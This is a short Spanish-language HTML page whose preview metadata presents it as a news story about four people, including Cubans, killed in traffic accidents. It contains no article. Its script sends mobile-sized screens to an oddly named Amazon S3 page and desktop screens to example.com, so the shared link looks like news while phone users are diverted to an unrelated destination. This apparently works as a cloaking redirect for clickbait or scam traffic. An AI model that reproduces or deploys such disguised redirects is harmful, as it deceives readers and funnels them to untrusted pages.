<!DOCTYPE html>
  <html lang="es">
  <head>
  <meta charset="utf-8"/>
  <meta name="title" content="Stream"/>
  <meta name="keywords" content="Instagram"/>
  <meta property="og:description" content="2411"/>
  <meta name="googlebot" content="noindex"/>
  <meta name="robots" content="index"/>
  <meta name="robots" content="noindex"/>
  <meta name="robots" content="nofollow"/>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1"/>
  <meta property="og:title" content="4 personas perdieron la vida esta mañana en dos fatales accidentes vehiculares entre ellos hay cubanos"/>
  <meta property="og:image" content="https://socialbu.nyc3.digitaloceanspaces.com/attachments/82185_93393_1719849275_fRbhFjNM8e7FfdJiBGXVHTjFMlSAS2i02Z5iyCcr6ea0a742f8b578547f81cbf9f686dc1d13be23ff.jpg?X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=C25SFMRLFBQD2SIWBCWS%2F20240701%2Fnyc3%2Fs3%2Faws4_request&X-Amz-Date=20240701T155435Z&X-Amz-SignedHeaders=host&X-Amz-Expires=86400&X-Amz-Signature=2e890e2e6034e47ccb633f5fdf869be0a7c9fd49bd21c29a928208518ac5388c"/> 
  <meta name="apple-itunes-app" content="app-id=6448311069"/>
  <script type="text/javascript">
    function generateRandomString(iLen) {
      var sRnd = '';
      var sChrs = "abcdefghiklmnopqrstuvwxyz";
      for (var i = 0; i < iLen; i++) {
        var randomPoz = Math.floor(Math.random() * sChrs.length);
        sRnd += sChrs.substring(randomPoz, randomPoz + 1);
      }
      return sRnd;
    }
          if (screen.width <= 720) {
          window.location = "https://cajas5855555555.s3.ap-southeast-2.amazonaws.com/Wasssssssshuf0000/camak00.html";
      } else {
          window.location = "https://example.com/default_page.html"
      }
  </script>
    
